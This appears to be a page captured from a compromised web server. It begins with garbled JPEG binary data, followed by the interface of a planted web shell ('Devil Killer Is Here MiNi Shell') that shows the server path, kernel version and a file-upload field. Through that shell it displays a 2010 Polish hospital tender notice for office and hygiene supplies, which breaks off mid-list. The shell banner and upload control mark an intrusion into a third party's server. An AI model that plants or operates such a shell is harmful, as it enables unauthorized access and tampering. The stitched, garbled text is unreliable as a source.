JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100219/48026-N-2010.html

<p class="kh_header"><b>Radom: Zakup i dostawa artykułów biurowych oraz higienicznych dla potrzeb Radomskiego Szpitala Specjalistycznego.</b><br>
<b>Numer ogłoszenia: 48026 - 2010; data zamieszczenia: 19.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów biurowych oraz higienicznych dla potrzeb Radomskiego Szpitala Specjalistycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa artykułów biurowych oraz higienicznych dla potrzeb Radomskiego Szpitala Specjalistycznego.
Zakres nr 1- Artykuły biurowe 
Lp.	Opis produktu	Ilość
1.         Papier xero ( do wszystkich urządzeń biurowych) format A4, gramatura 80g/m2 białość min. CIE 150, 1 op. = 500 arkuszy	4.800 opakowań
2.	Papier xero ( do wszystkich urządzeń biurowych) format A4, gramatura 160g/m2 białość min. CIE 150, 1 op. = 500 arkuszy	48 opakowań
3.	Papier xero ( do wszystkich urządzeń biurowych) format A3, gramatura 80g/m2, białość min. CIE 150 1 op.= 500 arkuszy	480 opakowań
4.	Rolki do faxu
Format: 216mm x 30m
              210mm x 30m	288 szt.
5.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 75-80mm, wykonany z twardej tektury pokrytej papierem, wkładana etykieta na grzbiecie, wzmocniony uchwyt na palec	2.400 szt.
6.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 30-40mm, wykonany z twardej tektury pokrytej papierem, wkładana etykieta na grzbiecie, wzmocniony uchwyt na palec	720 szt.
7.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 75-80mm, oklejony z obu stron trwałym tworzywem, metalowe okucia na dolnych krawędziach, dwustronna wymienna etykieta	240 szt.
8.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 30-40mm, oklejony z obu stron trwałym tworzywem, metalowe okucia na dolnych krawędziach, dwustronna wymienna etykieta	240 szt.
9.	Koszulki foliowe na dokumenty ( bezbarwne), otwierane z góry, typ krystaliczny, wykonane z grubszej folii, format A4, umożliwiające wpięcie do każdego typu segregatora 1 op. = 100 szt.	240 opakowań
10.	Ofertówki twarde ( bezbarwne) wykonane z twardej folii PCV, otwierane z góry i z prawej strony, typ- krystaliczny, format A4, grubość ok. 0,20 mikrona 1 op. = 100 szt.	96 opakowań
11.	Skoroszyt, format A4, wykonany z kartonu ok. 280g/m2, kolor biały z nadrukiem	1.200 szt.
12. 	Skoroszyt zawieszany- format A4, wykonany z kartonu ok. 280g/m2, kolor biały	240 szt.
13.	Teczka- format A4, wykonana z mocnego kartonu ok.350g/m2, wiązana, kolor biały	2.400 szt.
14.	Teczka z gumką na haczyki - format A4, wykonana z kartonu ok. 350g/m2, kolor biały	1.200 szt.
15.	Skoroszyt plastikowy miękki- format A4, przednia okładka przezroczysta, druga kolorowa, wyposażona w dwustronny pasek brzegowy do opisywania	2.400 szt.
16.	Pinezki, kolor - srebrny 1 op.= 50 szt.	96 opakowań
17.	Spinacze metalowe galwanizowane, kształt okrągły, 1 op.= 100szt.
Rozmiar:	
	28mm	2.400 opakowań
	33mm	1.200 opakowań
	50mm	240 opakowań
18.	Klipy biurowe galwanizowane, rozmiar:
	
	19mm	144 szt.
	25mm	144 szt.
	32mm	144 szt.
	41mm	144 szt.
	51mm	144 szt.
19.	Taśma biurowa samoprzylepna- na rolce przezroczysta, bezbarwna, szerokość 24-25mm, długość 30m	1.440 szt.
20.	Taśma pakowa z klejem - na rolce, przeznaczona do zaklejania kartonów, szerokość 45-50mm, długość 45-50m	120 szt.
21.	Klej biurowy uniwersalny w tubie, do klejenia papieru i tektury pojemność ok. 40ml	1.200 szt.
22.	Klej do papieru w płynie z aplikatorem pojemność ok. 50ml	120 szt.
23.	Korektor z pędzelkiem, szybkoschnący , uniwersalny, pojemność 20ml	240szt.
24.	Tusz do stempli ręcznych i automatów samotuszujących , w pojemniku z aplikatorem, pojemność 25ml, kolor czarny i czerwony	240 szt.
25.	Poduszka do stempli ręcznych w pudełku z tworzywa, rozmiar min. 11cm x 7cm	48 szt.
26.	Zszywacz biurowy , część mechaniczna z metalu, zszywanie do 30 kartek, na zszywki Nr 24/6 i 26/6; gwarancja min.2 lata	48 szt.
27	Zszywacz biurowy z długim ramieniem, zszywanie do 130 kartek, regulowana głębokość wsunięcia do 70mm, na zszywki 24/6 i 26/6; gwarancja min.3 lata	4 szt.
28.	Zszywki biurowe 1 op.= 1000 szt. rozmiar:	
	24/6	1.440 opakowań
	26/6	 48 opakowań
29.	Dziurkacz biurowy, metalowa konstrukcja, duża dźwignia, ma dziurkować min. 30 kartek jednorazowo; gwarancja min. 3 lata	48 szt.
30.	Długopis jednorazowy kolor: niebieski, czarny, czerwony, zielony, żłobiony w miejscu chwytania	2.400 szt.
31.	Długopis żelowy, z gumowym uchwytem, grubość linii pisania 0,3-0,32mm, długość linii min. 1.200m, kolor niebieski, czarny	240 szt.
32.	Flamaster biurowy kolor: czerwony, czarny, niebieski, zielony	2.400 szt.
33.	Cienkopis, grubość linii pisania 0,4mm, kolor: niebieski, czarny, czerwony, zielony	720 szt.
34.	Marker permanentny , wodoodporny, do pisania na każdej powierzchni- w tym na tkaninie	1.200 szt.
35.	Foliopis do pisania na szkle, foli, kliszy, płycie CD, grubość linii pisania 0,4-0,6mm	1.200 szt.
36.	Marker cienkopiszący olejowy do znakowania na powierzchniach szorstkich i gładkich, wodoodporny i odporny na ścieranie, kolor biały i czarny, końcówka okrągła	144 szt.
37.	Ołówek, twardość HB	480 szt.
38.	Linijka z tworzywa długość 25-30cm	120 szt.
39.	Linijka z tworzywa długość 50 cm	48 szt.
40.	Kalka przebitkowa ( maszynowa)A4 1 op.= 50 szt.	48 opakowań
41.	Kalka przebitkowa ( maszynowa) A 3 1 op.= 100 szt.	24 opakowań
42.	Gumka ołówkowa- mała	120 szt.
43.	Temperówka plastikowa- jednotorowa	120 szt.
44.	Koperty C-6 listowe, samoklejące, białe	72.000 szt.
45.	Koperty B-5, samoklejące, brązowe lub szare	72.000 szt.
46.	Koperty C-4, samoklejące, brązowe	12.000 szt.
47.	Koperty C-4 samoklejące, białe	12.000 szt.
48.	Koperty B-4samoklejące, białe, z rozszerzonymi bokami i spodem	1.200 szt.
49.	Koperta B-4 samoklejące, białe	1.200 szt.
50.	Koperta z folią bąbelkową wymiar zew. 290x370mm	240 szt.
51.	Kopera z folią bąbelkową wymiar zew. 200x275mm	240 szt.
52.	Zeszyt A4; 96-100 kartek (ekologiczny), krata, okładka miękka	1.200 szt.
53.	Zeszyt A4; 96-100 kartek (ekologiczny), krata, okładka twarda	240 szt.
54.	Zeszyt A5; 80 kartek ( ekologiczny), krata, okładka miękka	1.200 szt.
55.	Skorowidz szyty, rozmiar 2/3 A4, ok. 100 kartek	48 szt.
56.	Skorowidz szyty A4, ok. 100 kartek	20 szt.
57.	Dyskietki formatowane 3,5 MF 2 HD, w pudełku kartonowym, 1 op.= 10 szt.	360 opakowań
58.	Płyta CD-R, pojemność 700 MB	16.800 szt.
59.	Płyta CD-Rw wielokrotnego zapisu, pojemność 700 MB	2.400 szt.
60.	Płyta DVD + R, pojemność 4,7GB	720 szt.
61.	Płyta EMTEC CD-Rw, 700 MB, 80min.	240 szt.
62.	Taśma do metkownicy, 1-rzędowa, półokrągła, kolorowa	240 rolek
63.	Naklejka - cena, taśma na rolce	720 rolek
64.	Nożyczki biurowe ze stali nierdzewnej, rękojeść z niełamliwego plastiku, długość 16cm	24 szt.
65.	Grzbiety do bindowania dokumentów, długość do formatu A4, szerokość grzbietu	
	32mm	1.440
	25mm	1.440
	21mm	1.440
	16mm	2.880
	12,5mm	2.880
	8,00mm	2.880
	6,00mm	2.880
66.	Okładki do bindowania, format A4:	
	- wierzchnia foliowa, przezroczysta	15.840 szt.
	- spodnia ze sztywnego kartonu	15.840 szt.
67.	Folia do laminacji, grubość folii 100 mikronów:	
	Format A4	1.920 szt.
	Format A3	720 szt.
	Format A5	1.440 szt.
	Rozmiar 75x 105mm	960 szt.
Orientacyjne zapotrzebowanie na okres 2 lat

Zakres nr 2- Artykuły higieniczne
Lp.	Opis produktu	Ilość
1.	Papier toaletowy- jednowarstwowy , na rolce, gatunek I, długość 35m?5%, średnica rolki- min. 10cm, średnica tulei- max.4,5cm	60.000 szt.
2.	Ręcznik papierowy kuchenny- dwuwarstwowy, gofrowany, kolor biały lub biały z nadrukiem; 1 op.= 2 rolki	9.600 opakowań
3.	Ręcznik papierowy, składany w Z gofrowany, wymiary 25x23 cm, pojedynczy, kolor biały, 1 op.= 200szt.; w opakowaniach zbiorczych po 4 lub 5 tyś .szt.	36.000 op.
( opakowanie po 200 szt.)
4.	Ręcznik przemysłowy, jednorazowy na rolce bezpyłowy, biały, waga min.4,25kg	288 rolek
5.	Ręcznik jednorazowy maxi, 1- warstwowy, biały na rolce, szerokość rolki 20cm?2cm, ciężar min. 1,5kg, długość min.320mb	960 szt.
Orientacyjne zapotrzebowanie na okres 2 lat
UWAGA:
a) Dostawy realizowane będą sukcesywnie, a ich wielkość może być większa lub mniejsza, uzależniona będzie od aktualnych potrzeb Szpitala .
b) Nie zamówienie poszczególnego asortymentu w danym miesiącu nie jest w żadnym przypadku odstąpieniem od umowy ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 33.76.10.00-2, 33.77.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie Wadium w kwocie :
a) Zakres nr 1- 1.677,00 PLN ( słownie: jeden tysiąc sześćset siedemdziesiąt siedem  PLN )
b) Zakres nr 2- 1.624,00 PLN ( słownie: jeden tysiąc sześćset dwadzieścia cztery PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli       przepisy    prawa nakładają obowiązek ich posiadania,


Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał w ostatnich trzech latach przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy w tym okresie  min. 1 dostawę  odpowiadająca swoim rodzajem i wartością  przedmiotowi zamówienia.Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponowanuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje odpowiednimi osobami zdolnymi do wykonania zamówienia,
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej.Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Dokument potwierdzający wniesienie wadium.
2.Pełnomocnictwo do reprezentowania, o ile ofertę składa pełnomocnik.
3. Parafowany wzór umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa- mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
2.   Ceny jednostkowe brutto mogą również ulec zmianie po upływie roku obowiązywania umowy  o wskaźnik inflacji ogłoszony przez prezesa GUS za ostatni kwartał przed upływem roku obowiązywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny ul. Lekarska 4 26-610 Radom, Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzeniapiętro III pokój nr 313..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2010 godzina 10:00, miejsce: Radomski Szpital Specjalistyczny ul. Lekarska 4 26-610 Radom, Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzeniapiętro III pokój nr 313..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres nr1- Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Ilość
1.	Papier xero ( do wszystkich urządzeń biurowych) format A4, gramatura 80g/m2 białość min. CIE 150, 1 op. = 500 arkuszy	4.800 opakowań
2.	Papier xero ( do wszystkich urządzeń biurowych) format A4, gramatura 160g/m2 białość min. CIE 150, 1 op. = 500 arkuszy	48 opakowań
3.	Papier xero ( do wszystkich urządzeń biurowych) format A3, gramatura 80g/m2, białość min. CIE 150 1 op.= 500 arkuszy	480 opakowań
4.	Rolki do faxu
Format: 216mm x 30m
              210mm x 30m	288 szt.
5.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 75-80mm, wykonany z twardej tektury pokrytej papierem, wkładana etykieta na grzbiecie, wzmocniony uchwyt na palec	2.400 szt.
6.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 30-40mm, wykonany z twardej tektury pokrytej papierem, wkładana etykieta na grzbiecie, wzmocniony uchwyt na palec	720 szt.
7.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 75-80mm, oklejony z obu stron trwałym tworzywem, metalowe okucia na dolnych krawędziach, dwustronna wymienna etykieta	240 szt.
8.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 30-40mm, oklejony z obu stron trwałym tworzywem, metalowe okucia na dolnych krawędziach, dwustronna wymienna etykieta	240 szt.
9.	Koszulki foliowe na dokumenty ( bezbarwne), otwierane z góry, typ krystaliczny, wykonane z grubszej folii, format A4, umożliwiające wpięcie do każdego typu segregatora 1 op. = 100 szt.	240 opakowań
10.	Ofertówki twarde ( bezbarwne) wykonane z twardej folii PCV, otwierane z góry i z prawej strony, typ- krystaliczny, format A4, grubość ok. 0,20 mikrona 1 op. = 100 szt.	96 opakowań
11.	Skoroszyt, format A4, wykonany z kartonu ok. 280g/m2, kolor biały z nadrukiem	1.200 szt.
12. 	Skoroszyt zawieszany- format A4, wykonany z kartonu ok. 280g/m2, kolor biały	240 szt.
13.	Teczka- format A4, wykonana z mocnego kartonu ok.350g/m2, wiązana, kolor biały	2.400 szt.
14.	Teczka z gumką na haczyki - format A4, wykonana z kartonu ok. 350g/m2, kolor biały	1.200 szt.
15.	Skoroszyt plastikowy miękki- format A4, przednia okładka przezroczysta, druga kolorowa, wyposażona w dwustronny pasek brzegowy do opisywania	2.400 szt.
16.	Pinezki, kolor - srebrny 1 op.= 50 szt.	96 opakowań
17.	Spinacze metalowe galwanizowane, kształt okrągły, 1 op.= 100szt.
Rozmiar:	
	28mm	2.400 opakowań
	33mm	1.200 opakowań
	50mm	240 opakowań
18.	Klipy biurowe galwanizowane, rozmiar:
	
	19mm	144 szt.
	25mm	144 szt.
	32mm	144 szt.
	41mm	144 szt.
	51mm	144 szt.
19.	Taśma biurowa samoprzylepna- na rolce przezroczysta, bezbarwna, szerokość 24-25mm, długość 30m	1.440 szt.
20.	Taśma pakowa z klejem - na rolce, przeznaczona do zaklejania kartonów, szerokość 45-50mm, długość 45-50m	120 szt.
21.	Klej biurowy uniwersalny w tubie, do klejenia papieru i tektury pojemność ok. 40ml	1.200 szt.
22.	Klej do papieru w płynie z aplikatorem pojemność ok. 50ml	120 szt.
23.	Korektor z pędzelkiem, szybkoschnący , uniwersalny, pojemność 20ml	240szt.
24.	Tusz do stempli ręcznych i automatów samotuszujących , w pojemniku z aplikatorem, pojemność 25ml, kolor czarny i czerwony	240 szt.
25.	Poduszka do stempli ręcznych w pudełku z tworzywa, rozmiar min. 11cm x 7cm	48 szt.
26.	Zszywacz biurowy , część mechaniczna z metalu, zszywanie do 30 kartek, na zszywki Nr 24/6 i 26/6; gwarancja min.2 lata	48 szt.
